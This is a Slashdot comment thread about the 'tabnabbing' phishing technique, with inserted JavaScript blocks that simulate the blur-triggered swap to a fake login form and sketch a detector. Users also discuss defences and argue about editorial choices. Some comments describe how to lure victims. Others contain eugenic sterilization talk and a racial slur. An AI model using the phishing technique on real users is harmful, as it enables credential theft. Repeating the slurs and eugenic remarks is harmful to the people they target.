    8. Re:Protect Those Morons ... for some reason by Anonymous Coward · · Score: 0

      ... why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?

      Certain 'officials' would not get elected if that was to happen. Doesn't matter which party.

      Let's sterilize them in too just to be safe.

    9. Re:Protect Those Morons ... for some reason by Golddess · · Score: 1

      Intelligence of the kind humans possess has gotten us off this mudball. Maybe there are "better" kinds of intelligence, but in the extreme long term (5 billion years or so), this most certainly represents an evolutionary advantage over any other species living today.

      --
      "I'm not sure I like the fugnutish tone you used in your post!" -RogL (608926)-
    10. Re:Protect Those Morons ... for some reason by neomunk · · Score: 1

      Personally, I think the jury remains out on whether intelligence of the kind humans possess represents an evolutionary advantage in the long term.

      Not if you take the phrase "long term" and extrapolate what that really means. I think that human intelligence is/will be needed if higher life is to survive on any real "long term". It would help greatly in surviving a truly catastrophic (read: apocalyptic) natural disaster, and is utterly required for the species to survive something on the order of Earth's destruction.

      Maybe it's not that beneficial to mid-term survival (or at least not PERSONALLY beneficial, the benefits of intelligence being mostly shared with the community at large) but in an actual long-haul look at survivability, I think it's the ONLY beneficial mutation that will matter.

      This is assuming, of course, that sea turtles don't become space turtles before the evolutionary make-or-break event comes to pass.

    11. Re:Protect Those Morons ... for some reason by not+flu · · Score: 1

      Neanderthals were the ones with bigger brains than ours that went extinct.

    12. Re:Protect Those Morons ... for some reason by Boomshadow · · Score: 1

      Our brains have not gone extinct (at least mine hasn't)! They're just endangered.

    13. Re:Protect Those Morons ... for some reason by TheCrayfish · · Score: 1

      in the extreme long term (5 billion years or so), this most certainly represents an evolutionary advantage over any other species living today.

      I only quibble with your use of the word "certainly." We won't know whether human intelligence represents an evolutionary advantage over other Earth species until (and if) our species manages to successfully relocate to another planet.

  23. Server delayed HTTP response as a push by roman_mir · · Score: 2, Interesting

    Even if the scripts are completely disabled on the page, what about a delayed HTTP response, in effect a push to the browser by a server that is done sometime after the page is loaded as a delayed response to the browser request?

    It's really hard to avoid all possible scenarios on how a page can be changed from something to something else.

    1. Re:Server delayed HTTP response as a push by Smallpond · · Score: 1

      You would have the annoying "Firefox Freeze" waiting at 99% for the page to finish loading. However, this is so common that nobody would notice.

    2. Re:Server delayed HTTP response as a push by nmg196 · · Score: 1

      There is no such thing as HTTP "push" (well, there is, but it's not what you're suggesting). Once the page finishes loading, that's it - no more data. You cannot open a connection to a browser from a server after the page has finished loading.

    3. Re:Server delayed HTTP response as a push by roman_mir · · Score: 1

      There is no HTTP push, but I can set a response to be delayed and send the data into the browser upon a server event, it's better than browser polling, but results in the browser displaying the 'loading' status until the response is complete and it does not reliably work through proxies.

    4. Re:Server delayed HTTP response as a push by dotancohen · · Score: 1

      You would have the annoying "Firefox Freeze" waiting at 99% for the page to finish loading. However, this is so common that nobody would notice.

      Please comment on this Firefox bug, the Mozilla folks just don't believe me that this bug exists:
      https://bugzilla.mozilla.org/show_bug.cgi?id=434180

      Thanks!

      --
      It is dangerous to be right when the government is wrong.
  24. AND if ... by khasim · · Score: 1

    Exactly ... but if the 'fake' site checks your browser history for the specific fake login screens they have in their repertoire then they can show one that you have used recently.

    AND if you're not using noscript (or equivalent) or you allow that site to run whatever javascript it wants. And so forth.

  25. Possible Solution - whitelisting? by Jahava · · Score: 1

    So this is a pretty clever thing to do. The issues here are that it's sneaky, remarkably effective (even against those who are security-aware), and difficult to stop, since tabbed browsing is generally regarded as a good thing.

    One possible solution would be to have browser support for user-opted website whitelisting. When you visit a site where you require security (banking, etc.) for the first time, you can configure your browser to add the domain to a security-aware whitelist. Every time, from then on, when you visit that page, your browser visually (and obviously) marks that page (gold border, animated lock, etc.) if its SSL credentials check out. As a user, I would simply have to know "always check for those visual effects before you enter your banking information", which is not a hard thing to remember.

    Another would be to have a browser-supplied interface for entering credentials that can be invoked by the site. You click the log-in button, your browser supplies a "Guaranteed Secure" login modal dialog, you enter your information, and your browser then forwards it to the page and logs you in. You can then add important domains to the list, and your browser will never pop-up that dialog for a page that isn't on that list. Same as above, you would elect to whitelist sites that are important in advance, and because it's a browser-supplied login, no fake tab (or fake SSL certificate) will be able to induce that dialog.

    At some point, people will figure out clever ways around things. The browser needs to be able to accommodate the idea that every page on the Internet is not equal from the point of view of the user. There must be a mechanism by which the browser can allow a user to easily (visually) differentiate between a legit page and one that has made itself look legit.

    1. Re:Possible Solution - whitelisting? by Anonymous Coward · · Score: 0

      Don't be such a racist, no-one is going to get away with whites only websites.

      Now, I will type the word in the image to prove I'm not a nigger.

  26. Why is this about tabs at all? by phiwum · · Score: 1

    As far as I can tell, the script merely waits a while (hoping that the user's attention is diverted) before changing the contents. Surely, the same idea works about as well if the user uses multiple windows rather than multiple tabs. Just as soon as attention is diverted from the appropriate browser and it is covered by other windows, the content could be changed without the user noticing.

    The only difference is that, with multiple windows, a portion of the window may still be visible when the user is looking at another window. In my limited experience, folks tend to maximize windows anyway (I *hate* that!), so that's not a significant issue.

    Am I missing something?

    --
    Phiwum's law: anyone that names an obvious law after himself and then puts it in his own sig is just pathetic.
    1. Re:Why is this about tabs at all? by ShadowRangerRIT · · Score: 1

      All you're (possibly) missing is that a proper implementation wouldn't use a fixed wait. It would set a timer to make the switch after a window.onblur event, and execute the switch only if the window remains "blurred" the whole time. You don't need to guess at when the user is distracted, you just need to tweak the delay to increase the odds that they forget the contents of the tab. Tabs aren't required; minimizing would work just as well, and possibly even being hidden by other windows (not sure of the exact specs for window.onblur), but the most common case where someone forgets the contents of a tab is when they've got 20+ tabs open. So if it's mostly enabled by multiple tabs, and only likely to work with multiple tabs, it's not unreasonable to identify it with tabbed browsing.

      --
      $_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
    2. Re:Why is this about tabs at all? by phiwum · · Score: 1

      Thanks. According to http://www.java2s.com/Tutorial/JavaScript/0380__Window/windowonBlur.htm, onblur is triggered whenever focus is lost, so it seems to me that moving focus to another window would similarly work for this phishing attack.

      --
      Phiwum's law: anyone that names an obvious law after himself and then puts it in his own sig is just pathetic.
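The mechanism described in this thread, and earlier in the "Can Javascript do this?" thread (the page rewrites only its own tab, arms a timer on window.onblur, and executes the swap only if the window stayed blurred the whole time), is small enough to show in full. The following is an added example written for this page, not Aza Raskin's proof of concept or anything from the original post. To run under Node it drives the logic through a constructed fake window with its own clock; in a real page the same two listeners would be attached with window.addEventListener('blur', ...) and ('focus', ...). The 10-second delay, the cat-pictures URL and the generic "session expired" decoy are assumptions. What the example makes concrete is the defender's one reliable signal: location.href is never written, so the address bar still names the original site after the swap.

```javascript
'use strict';

// Constructed stand-in for a browser window so the logic runs under Node: it
// records blur/focus listeners, keeps a timer queue driven by advance(), and
// holds the state a user actually sees (title, favicon, body, address bar).
function makeFakeWindow(href) {
  const w = {
    location: { href },
    document: { title: 'Cute cat pictures', favicon: '/cat.ico', body: '<img src="cat.jpg">' },
    handlers: { blur: [], focus: [] },
    timers: [],
    now: 0,
    nextId: 1,
    addEventListener(type, fn) { w.handlers[type].push(fn); },
    setTimeout(fn, ms) {
      const id = w.nextId++;
      w.timers.push({ id, at: w.now + ms, fn });
      return id;
    },
    clearTimeout(id) { w.timers = w.timers.filter(t => t.id !== id); },
    // Harness controls: fire a focus event, or move the clock forward and run
    // every timer that has come due.
    blur() { w.handlers.blur.forEach(fn => fn()); },
    focus() { w.handlers.focus.forEach(fn => fn()); },
    advance(ms) {
      w.now += ms;
      const due = w.timers.filter(t => t.at <= w.now).sort((a, b) => a.at - b.at);
      w.timers = w.timers.filter(t => t.at > w.now);
      due.forEach(t => t.fn());
    },
  };
  return w;
}

// The mechanism the thread describes: arm a timer on blur, disarm it on focus,
// and rewrite the page in place only if the timer expires while the window is
// still blurred. Nothing here touches another tab, and location.href is never
// assigned, so the address bar keeps showing the original URL.
function installBlurSwap(win, delayMs, decoy) {
  let pending = null;
  win.addEventListener('blur', () => {
    if (pending !== null) return;          // already armed
    pending = win.setTimeout(() => {
      pending = null;
      win.document.title = decoy.title;
      win.document.favicon = decoy.favicon;
      win.document.body = decoy.body;
    }, delayMs);
  });
  win.addEventListener('focus', () => {
    if (pending !== null) {                // user came back early: abort
      win.clearTimeout(pending);
      pending = null;
    }
  });
}

// Runs one scenario: the tab is blurred at t=0 and optionally refocused at
// focusAfterMs. Returns what the user sees at totalMs.
function runScenario({ focusAfterMs = null, totalMs = 15000 } = {}) {
  const win = makeFakeWindow('http://cat-pictures.example/gallery');
  const decoy = {  // generic decoy; assumed for the example, not from the page
    title: 'Webmail: session expired, please sign in',
    favicon: '/webmail.ico',
    body: '<form><input name="user"><input name="pass" type="password"></form>',
  };
  installBlurSwap(win, 10000, decoy);
  win.blur();
  if (focusAfterMs !== null) {
    win.advance(focusAfterMs);
    win.focus();
    win.advance(totalMs - focusAfterMs);
  } else {
    win.advance(totalMs);
  }
  return {
    swapped: win.document.favicon === decoy.favicon,
    title: win.document.title,
    href: win.location.href,   // identical in both scenarios
  };
}

// Stand-alone run: left alone for 15 s versus refocused after 5 s.
console.log(runScenario(), runScenario({ focusAfterMs: 5000 }));
```

On the question of whether being covered by another window counts: blur fires whenever the window loses keyboard focus, whichever window took it, which is why the thread's conclusion that tabs are not essential holds. Modern browsers also expose document.visibilityState and the visibilitychange event, which report being hidden (background tab, minimised) rather than merely unfocused, so a page could gate on either.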
  27. you misunderstood ssl. by leuk_he · · Score: 1

    You are not to blame, because even the browser creators misunderstand ssl.

    -SSL does not mean that it is safe to input credentials.
    -More GUI does not help much.
    -If a site makes an error with SSL (expired, or changed subdomain) you only have an all-or-nothing option.

    As your parent article states, there already is an option to only enable javascript on trusted sites (noscript), but this relies on whitelisting particular sites. Only security-paranoid people (like me) use it.

  28. tabnappers by Anonymous Coward · · Score: 0

    and here I thought the article was about falling asleep on your keyboard while waiting for IE to bring up the next tab....
    I know, I use IE. It's not my fault. The government is forcing it on me. I also get to literally watch my html scan in as McCrapafee HBSS IPS grab my CPU by the neck and chokes the life out of it.

  29. Stop using web-based login forms by japonicus · · Score: 0

    A way to mitigate against tabnapping (and a lot of other phishing) would be for web sites to use HTTP authentication rather than 'pretty', but easily spoofed web page login forms. That way it's quite clear what page you're trying to log in to because login is through a hard-to-simulate browser dialogue box which states the target web address. Even quite clueless users might start looking more closely when phishingsite.example.com starts prompting them to log in.

  30. Re: Tab Mix Plus doesn't work well enough by TaoPhoenix · · Score: 2, Informative

    I tried it out and Protected/Froze/Locked the tab and the exploit ran.

    I think it's because the full contents were loaded and it didn't actually try to navigate anywhere.

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  31. Opera or Firefox with NoScript stops this attack by Anonymous Coward · · Score: 0

    Use Opera's script blocker or NoScript on Firefox to stop this type of attack.

    Also on the proof of concept's page, the contents changed to look like Gmail. The favicon and the address stayed the same. Tested on Opera.

    Many AJAX sites depend on similar functionality. I recommend whitelisting JavaScript allowed sites on your browser.

  32. Tabs are bad for you by Anonymous Coward · · Score: 0

    My brother always told me that tabs were bad

  33. STDs... by Anonymous Coward · · Score: 0

    Call these surfingly-transmitted diseases. It's amazing how apt "safe sex" is here. You need to not only consider that promiscuity will catch you something nasty, but that promiscuity of your partner (the website) will do so too.

    I'm a paranoid computer scientist who has been anticipating these vulnerabilities for as long as I've seen the web being corrupted with "active content" designs. I start browser sessions frequently throughout the day. I do not persist any cookies between sessions. I use NoScript (as of late) and privoxy (for many years) to block out most potential content. I use GNASH rather than Adobe flashplayer. I use xpdf rather than Adobe acroreader. I have a mental model of trust equivalence classes for all sites I visit, and I never mix trust classes into the same browser session. For critical stuff like banking, I never open more than one website per session, not even trusting one bank nor credit card site to run alongside another, even though they both control my money to some degree.

    Lately, I have been considering that my methods may not be secure enough, so I may start using additional user accounts with separate browser state on the filesystem, to better sandbox the browser from my working data and from other browser instances.

  34. Auto log off by abbynormal+brain · · Score: 1

    It's conceivable, especially under this circumstance, that an already open (let's say) Gmail page is re-written. What's the first thought that might come to mind? Oh, it auto logged off - only to have people "log back in". Agreed. This issue has potential. Bring out the fixes - soon!

    --
    L'esperienza de questa dolce vita (The experience of this sweet life) - Dante Alighieri, The Divine Comedy
  35. Slashdot's catering to its CRONIES? by Anonymous Coward · · Score: 1, Interesting

    "Slashdot is about news, not driving traffic to someone's website. And 'getting traffic' is not some kind of exchange or reward offered for submitting an article. If a different link is editorially better, then it is expected that the editors will swap it." - by mysidia (191772) on Tuesday May 25, @09:42AM (#32335284)

    Ahem: BULLSHIT! Slashdot's altering scamdetect's post is doing EXACTLY WHAT YOU ACCUSE SCAMDETECT OF (basically): Slashdot's editors altering scamdetect's source data is directing traffic to a "crony" of these so-called story editors' favorite/pal/affiliate (their crony in other words) site imo @ least... taking/playing "favorites" in essence.

    Krebs on security appears to be a "crony" (or what's the word SEO optimization scammers use? Oh, yes: "Affiliates") of the editors here!

    AGAIN: The editors here are in fact violating what you said yourself about "driving traffic to someone else's site" (which is EXACTLY what they're doing by taking out the url link that spamdetect put up, and putting in one of the slashdot editors' own choice instead).

    After all - Neither Kreb's article (dated Monday, May 24th, 2010 at 9:07 pm) nor the one scamdetect put up (dated today, Tues. May 25th, 2010) are the original discoverers of this material, so neither one's date data really matter either, as to "whom posted what first"!

    Nor is either one better than the other, imo @ least, editorially!

    (Now, as far as MY credentials in this field? Ok - I am a multiply degreed college grad here no less in both CSC & MIS, complete with all the English you'd ever need in both of those degrees I have on the subject of computer sciences (along with 16 yrs. of professional experience on my part & being multiply internationally published for my works in this science, plus being featured as tech shows like MS TechEd 2 yrs in a row as a finalist for commercial code work & ideas in the hardest category there in SQLServer Performance Enhancement while on paid contract to do so increasing the programs used effectiveness by 40% or more (block level device driver work & data structuring in said commercial wares of "Enterprise Class" scale classification) for them no less also)).

    I wonder who is more qualified on the subject of computing here... myself, or the "editors of slashdot"? I say that, because I disagree with your statements/thoughts, strongly, and I wager that the story editors here aren't even as qualified on this science & subject as I am (nor moreso on their parts in English either).

    Secondly: What exactly qualifies Slashdot's editors as to "what's better editorially"?

    Again - Do they have degrees in English to substantiate that they themselves are "expert" on what's better, editorially??

    I'd wager not.

    Man - You're the pot calling the kettle black man!

    (Plus, this isn't the first time I have seen this type of shenanigan out of slashdot (or other news websites) either!)

    This happens ALL THE TIME (in catering to "partners/affiliates/favorites" (spelled sideways = CRONIES!)), & I also feel it's wrong as well.

    APK

    P.S.=> Bottom-line? Well, I also think scamdetect has every right to be upset that his submission was altered by the story editors here, as to the link submitted data as the source, because I'd actually wager that Brian Krebs may be no more qualified as an expert in this area than are the folks that scamdetect originally used as his source data in fact - unless someone can show me that Brian Krebs has his CISSP certification, or an actual A.A.S. or B.S. (or better in post grad masters or doctoral work) in CSC related disciplines (or, those CSC degrees specifically those related to computer security actually)... apk

    1. Re:Slashdot's catering to its CRONIES? by NeutronCowboy · · Score: 1

      Slashdot's altering scamdetect's post is doing EXACTLY WHAT YOU ACCUSE SCAMDETECT OF

      Ah.... the moral relativism argument. How do I miss thee.... wait, I don't. It's guaranteed to be brought up by some nincompoop who missed Logic and Philosophy in his education. Krebsonsecurity is better, if for no other reason than that it is better known.

      All in all though, this was one of the most entertaining AC trolls I've read in a long time. I don't know if it is the foaming-at-the-mouth superiority complex, the irony of his bitching about the English skills of the editors, the complete incoherence of the entire post, or the double-bracketed, full-paragraph, single sentence diatribe about his irrelevant qualifications, but this AC kept me reading right to the end. I was actually kinda disappointed it ended.

      I'd give funny mods if I'd have them.

      --
      Those who can, do. Those who can't, sue.
    2. Re:Slashdot's catering to its CRONIES? by mysidia · · Score: 1

      Krebs on security appears to be a "crony" (or what's the word SEO optimization scammers use? Oh, yes: "Affiliates") of the editors here!

      You have evidence of this accusation against the integrity of Slashdot's Editors and (therefore) the Slashdot site itself?

      AGAIN: The editors here are in fact violating what you said yourself about "driving traffic to someone else's site

      Without evidence to the contrary, it seems like they are just doing their jobs and selecting which source is best to link to for the subject at hand. This is not necessarily always the 'discoverer'. Sometimes a better summary, or a more well-known site indicates a better link.

      I feel that this is within the editors' discretion, so long as you are not able to provide tangible evidence of an ulterior motive (such as financial gain); the editors of Slashdot deserve the benefit of the doubt, with regards to their motives.

      Nor is either one better than the other, imo @ least, editorially!

      In your opinion

      being multiply internationally published for my works in this science, plus being featured as tech shows like MS TechEd 2 yrs in a row as a finalist for commercial code work & ideas in the hardest category

      You claim the foregoing, and yet, you are posting this anonymously, and not identifying yourself, or showing any cause that permits an unbiased reader to believe you actually possess credentials like that (other than you claim to have them).

      Of course, this casts suspicion that you probably don't actually have the credentials, or there is a catch, and you have something to hide.

      In any case, your credentials don't automatically make your opinion the correct one, they don't form a logical argument.

      I would expect someone who actually has these credentials to understand that much, that listing your accomplishments doesn't make your opinion correct, particularly on matters those creds don't validate.

      Also, the Slashdot editors have some excellent credentials -- one of the most important ones, is, they are the editors of slashdot, and you are not.

      A CV with extensive experience in CS (Computer Security) or Management Information Systems, does not add up to editorial experience, for the slashdot audience.

    3. Re:Slashdot's catering to its CRONIES? by Anonymous Coward · · Score: 0

      LOL, now you've done it, you've set APK off.

      So now we have two blog posts, one of them bothered to link the actual inventor of the exploit and one of them didn't bother to link anything but some flash video site, and the editor went with the guy with the links. Maybe krebs is giving a kickback, who knows?

      Both of the blog posts sucked, neither of them mentioned using :visited to pick a fake login page that would actually apply to the target, nor did they mention using javascript's import capability (<script src="..."> doesn't have "Same Source" restrictions on it) and detect whether the user had logged in and therefore might reasonably expect to see that their connection timed out and they'd need to log in again.

      Oh look, at least Krebs bothered to mention that there's a proof of concept now that kind of works on firefox even with NoScript by combining the css image :visited concept with a meta refresh: http://avivraff.com/research/phish/article.php?854817837

      But oh no, "editorially" this is totally not better than that other guy's post.

    4. Re:Slashdot's catering to its CRONIES? by jwl17330536 · · Score: 1

      After reading this I'm not sure you are as qualified as you like to think! http://www.thorschrock.com/2008/05/19/how-to-respond-when-people-threaten-to-sue-you-on-the-web/

  36. Use different profiles by mathemaniac · · Score: 1

    Why not use different profiles with the -no-remote option? Even if you have multiple tabs open and multiple browser windows, have a profile for financial operations only, or whatever you want to protect and have a persona that is easily recognized for that purpose. Then browser history with personal finance history will not be exposed to your other browsing.

  37. I'm with you man... apk by Anonymous Coward · · Score: 0

    See my reply here to your "naysayers" -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32336794 & see my subject line above scamdetect.

    APK

    1. Re:I'm with you man... apk by scamdetect · · Score: 1

      support appreciated - thank you!

  38. Re:Opera or Firefox with NoScript stops this attac by ShadowRangerRIT · · Score: 1

    Except that so many websites are JavaScript dependent that temporarily allowing JS from a page is fairly common for all but the most paranoid. Design your malicious site to be unusable without JavaScript, 90% of NoScript users will at least temporarily whitelist it if the content is of sufficient interest; I recommend porn. When they quickly switch tabs so their bosses don't see the porno site, switch to a fake log-in screen.

    Yeah, most people will catch it, but you aren't coding for most people. You're coding for dumbasses (or people ignorant of this exploit with little native skepticism), and even among NoScript users, I guarantee a few percent of them forget what they were doing, overlook the address bar, and rationalize the log-in screen by assuming they must have opened it and forgot about it, then remember something they needed to do and enter their log-in details.

    --
    $_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
  39. Fairly easy to counter by jimbolauski · · Score: 1

    So a page renders itself, then waits until it's inactive, then rerenders; it won't take long for a patch.

    --
    Knowledge = Power
    P= W/t
    t=Money
    Money = Work/Knowledge so the less you know the more you make
  40. Brian Krebs is no more qualified than you are man by Anonymous Coward · · Score: 0

    Brian Krebs doesn't have a degree in CSC, CIS, or MIS (nor a CISSP or like computer security cert. to his credit (I just checked on this in fact, after I wrote the material I have here now and in the URL I put down below here, which was my original reply to your "naysayers" here)).

    After all - Neither yourself, NOR BRIAN KREBS, are the discoverers of this material, so the date data is immaterial (don't berate yourself on that account spamdetect, yours is just as valid as his is, and, to be honest about it? I found YOURS easier to read (shorter & to the point)).

    Here was my original reply to your naysayers, so, "drink it in, & digest it" -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32336794

    APK

    P.S.=> Others here in this very thread are also noting that slashdot's "editorial crew" (what exactly makes them expert in being professional editors anyhow, especially on the note of English & editorials? I bring that up in my URL above, & especially on the subject of computing no less) tends to "favor" their "crony" Brian Krebs here on this website, constantly it seems!

    It's NOT just me saying it either, as it's also noted by others here as well on this very subject -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32335196 and it was uprated +1 already too, so... apk

  41. Tabs are stupid by DrugCheese · · Score: 1

    I've never understood tabs myself. I already had tabs built into my operating system, they called it the taskbar. What's the vulnerability being attacked here anyway? I know of no way for content in one tab to insert content or even change the location of another tab ...

    --
    *DrugCheese rants*
    1. Re:Tabs are stupid by Qzukk · · Score: 1

      I already had tabs built into my operating system, they called it the taskbar.

      Sure, if you have a task bar that takes up half the screen or you want to go through dozens of "tabs" that all say "Internet Ex..." At least firefox's default tab bar starts scrolling once there's too much to fit on one line without changing the title to "Sl..."

      What's the vulnerability being attacked here anyway?

      The User. BTW, this works on multiple windows too.

      I know of no way for content in one tab to insert content or even change the location of another tab ...

      It doesn't. Attacker convinces The User to click on example.com/evilsite/awwcutekitty.html which shows them a cute kitty. They think it's neat and they go to tweet it to their friends or whatever. Once they switch tabs (or windows) the onblur command replaces the cute kitty with a login screen, possibly one chosen using the :visited css hack so it looks like a site they actually use. They go back to where they thought the cute kitty was, and when the cute kitty isn't there anymore, they don't think "Hey my cat picture has been replaced by a gmail phishing site" they think "aww I must have closed it. Now I gotta log back into gmail to get the link again since my session timed out"

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
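      The sequence Qzukk lays out (page goes quiet when the tab loses focus, a login form is sitting there when the user comes back, no navigation in between) is also exactly what a defender can look for. The block below is an added example, not code from the thread or from any browser vendor: it records a few signals about a page when its tab goes hidden, compares them when the tab is shown again, and flags a password field that appeared in between without the URL changing. The snapshot function needs a DOM (it would live in an extension content script); the comparison is pure JavaScript, so it runs under Node on the constructed snapshots at the bottom. All URLs, titles and favicon paths are made up for the example.

```javascript
// Added example (not from the thread): heuristic detector for the hidden-tab
// page swap described above. Snapshot on hide, compare on show, warn if a
// login form materialised while nobody was looking and the URL did not move.

function takeSnapshot(doc, loc) {
  // Browser side: pull out the few signals the comparison needs.
  const icon = doc.querySelector('link[rel~="icon"]');
  return {
    href: loc.href,
    title: doc.title,
    passwordFields: doc.querySelectorAll('input[type="password"]').length,
    faviconHref: icon ? icon.href : null,
  };
}

function assessTabSwap(before, after) {
  // before: snapshot taken when the tab became hidden; after: when it became visible again.
  const reasons = [];
  if (before.href !== after.href) {
    // A real navigation moves the address bar along with the content; that case is
    // left to origin/URL-based phishing checks rather than this heuristic.
    return { suspicious: false, confidence: 'none', reasons: ['page navigated while hidden'] };
  }
  const loginAppeared = before.passwordFields === 0 && after.passwordFields > 0;
  if (loginAppeared) reasons.push('a password field appeared while the tab was hidden');
  if (before.title !== after.title) {
    reasons.push(`title changed from ${JSON.stringify(before.title)} to ${JSON.stringify(after.title)}`);
  }
  if (before.faviconHref !== after.faviconHref) reasons.push('favicon changed while the tab was hidden');
  if (!loginAppeared) {
    // Title and favicon churn on their own is routine (unread counts, notifications).
    return { suspicious: false, confidence: 'none', reasons };
  }
  // A new login form is the core signal. If the page also changed its displayed
  // identity (title/favicon) that is the textbook pattern, so rate it higher; a
  // swap that keeps title and favicon (as reported for Opera upthread) is "medium".
  const confidence = reasons.length > 1 ? 'high' : 'medium';
  return { suspicious: true, confidence, reasons };
}

function installTabSwapWatcher(doc, loc, report) {
  // Browser wiring: snapshot on hide, compare on show, report only on a hit.
  let hidden = null;
  doc.addEventListener('visibilitychange', () => {
    if (doc.visibilityState === 'hidden') { hidden = takeSnapshot(doc, loc); return; }
    if (!hidden) return;
    const verdict = assessTabSwap(hidden, takeSnapshot(doc, loc));
    hidden = null;
    if (verdict.suspicious) report(verdict);
  });
}

// Constructed snapshots modelling the scenario in the comment above (all values made up).
const KITTY_WHEN_HIDDEN = {
  href: 'http://example.com/evilsite/awwcutekitty.html', title: 'aww cute kitty',
  passwordFields: 0, faviconHref: 'http://example.com/evilsite/kitty.ico',
};
const FAKE_LOGIN_WHEN_SHOWN = {
  href: 'http://example.com/evilsite/awwcutekitty.html', title: 'Gmail: Email from Google',
  passwordFields: 1, faviconHref: 'http://example.com/evilsite/mail.ico',
};
// Benign: a webmail tab whose title picked up an unread count while hidden.
const MAIL_WHEN_HIDDEN = {
  href: 'https://mail.example.org/inbox', title: 'Inbox',
  passwordFields: 0, faviconHref: 'https://mail.example.org/favicon.ico',
};
const MAIL_WHEN_SHOWN = { ...MAIL_WHEN_HIDDEN, title: 'Inbox (3)' };

if (typeof document !== 'undefined') {
  installTabSwapWatcher(document, location,
    v => console.warn('possible tabnabbing: ' + v.reasons.join('; ')));
} else {
  console.log(assessTabSwap(KITTY_WHEN_HIDDEN, FAKE_LOGIN_WHEN_SHOWN));
  console.log(assessTabSwap(MAIL_WHEN_HIDDEN, MAIL_WHEN_SHOWN));
}
```

      The heuristic deliberately ignores title and favicon changes unless a password field also showed up, because legitimate pages change those constantly; what it cannot catch is a swap done by navigating (the meta-refresh variant mentioned elsewhere in the thread), which is where the address bar and ordinary URL checks have to do the work.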
    2. Re:Tabs are stupid by DrugCheese · · Score: 1

      It doesn't. Attacker convinces The User to click on example.com/evilsite/awwcutekitty.html which shows them a cute kitty. They think it's neat and they go to tweet it to their friends or whatever. Once they switch tabs (or windows) the onblur command replaces the cute kitty with a login screen, possibly one chosen using the :visited css hack so it looks like a site they actually use. They go back to where they thought the cute kitty was, and when the cute kitty isn't there anymore, they don't think "Hey my cat picture has been replaced by a gmail phishing site" they think "aww I must have closed it. Now I gotta log back into gmail to get the link again since my session timed out"

      That's what I thought, so really it's nothing at all to do with tabs per se. I'm a great multi-tasker, but I've never seen the benefit of having more than 4-5 open windows/tabs at once. Even if I'm doing some type of development online. It's much quicker, for me, to just open a new window and go to the new site I want to visit, even if I do it several times an hour. I close the window when I'm done and I know right where to access it again next time, by opening a new one ...

      --
      *DrugCheese rants*
  42. Which "morons"? by wrencherd · · Score: 1

    I think I'd want to have some kind of referendum on what "stupid" is before I'd agree to the whole sterilization thing.

    And as far as natural selection taking care of stupidity, it much more often seems like the stupider one is the more their reproductive practice takes on a pattern similar to that of voting in Chicago: early and often.

    1. Re:Which "morons"? by peragrin · · Score: 0, Troll

      anyone with an IQ under 100 would work just fine. Since that is half the population anyways it would be good for world wide population control too. If you want to be nice you can even throw in an average. You can take the test 3 times and they average your score.

      Bonus it would limit the influence of religion as most conservatives, and religious idiots are under 100 IQ points anyways, and those that are above it while holding their beliefs actually can be reasoned with.

      --
      i thought once I was found, but it was only a dream.
  43. sending passwords to a "new" site by ftobin · · Score: 1

    I don't see why it would be so hard for Firefox to simply report to the user a warning when they begin to send a particular password to a "new" site, one that they haven't sent a password to before, and even more so if the password is generally sent to another site.

    I think this solution fits the problem well, as you're trying to prevent yourself from sending passwords to places that shouldn't get them.

  44. Never.. by speroni · · Score: 1

    .. leave your bank tab open and walk away.

    Sure I'll leave facebook or gmail open, but there's limited damage that can happen from someone hacking them.

    Also for some reason I usually have two windows open, one for "serious business" where gmail is the first tab, facebook is the second tab, then whatever else I happen to be looking at in the other tabs. Then in a whole other window there's the random youtube, flash games and stumble upon results. Always keeping facebook and gmail in the same tabs limits the chances of me being tricked by this by anything I regularly log into. WTF is gmail doing all the way over here!?

    --
    Eschew Obfuscation
  45. Does Brian Krebs have a CISSP or A.A.S/B.S. in CSC by Anonymous Coward · · Score: 0

    No to the above... now, as to what YOU stated? OK:

    "Of course you think your blog was better than krebsonsecurity, but personally I almost never click on any link with "blog" in the name, especially from slashdot." - by mcgrew (92797) * on Tuesday May 25, @10:18AM (#32335816)

    http://it.slashdot.org/comments.pl?sid=1664046&cid=32336794 in my original reply here (thanks for the "+1 mod up" to whomever up modded my post here, because it's a serious rarity for us AC's to get EVEN THAT level of moderation upwards, considering our posts are often buried because we're not foolish enough to register here to be easily tracked for trolling registered users and the fact that we start at ZERO/0 mod points)!

    I said that in that URL above because I agree (along with many others here such as this one, also moderated upwards here for the same basic points I made in my URL above -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32335196 ) that spamdetect was done wrong by the editors here, and his asking that his original data link as the source be reinstated (or, at least, co-posted as a secondary substantiating source).

    APK

    P.S.=> Kindly show ANY OF US, that Brian Krebs has a CISSP, or an A.A.S./B.S., masters or PHD in CIS, MIS, CSC or other computer sciences related disciplines (plus an English degree to his name also) that qualifies him as "better or more expert" on the subject of computing (specifically security would help even more)? Then, we'll listen... otherwise, you're appearing to myself as another "let's butter up the owners/mods at slashdot" type (a crony/sycophant/bootlicker, if not one of the mods/owners here defending himself via alternate logons (if you guys do NOT think this occurs on websites? LOL, boy... are you naive!))... apk

  46. You FAIL logic (appeal to incorrect authority) by Anonymous Coward · · Score: 0

    Have YOU even passed a formally administered LOGIC course? I think not, and it's because you're appealing to an incorrect authority (a major logical fallacy tenet in fact, on your part, lol).

    "It's guaranteed to be brought up by some nincompoop who missed Logic and Philosophy in his education. Krebsonsecurity is better, if for no other reason that it is better known." - by NeutronCowboy (896098) on Tuesday May 25, @01:06PM (#32338036)

    Ahem: I actually took, and did fairly well, @ LOGIC while in academia, have you? Obviously not, and all your name calling's only showing that's the "best you've got" (but no coursework in logic to your credit obviously, other than the "pseudo logic" used on forums, lol!)

    (Obviously you have not taken LOGIC on YOUR part, and certainly not in CSC, because if you did, you'd realize it's commonly a requirement for said degree (At least in the "best schools" which are typically found in the North East United States and that's where I took both my degrees!))

    You failed, and why? Because of what you used... in LOGIC, using what you have is called (so you know) an "appeal to an incorrect authority"!

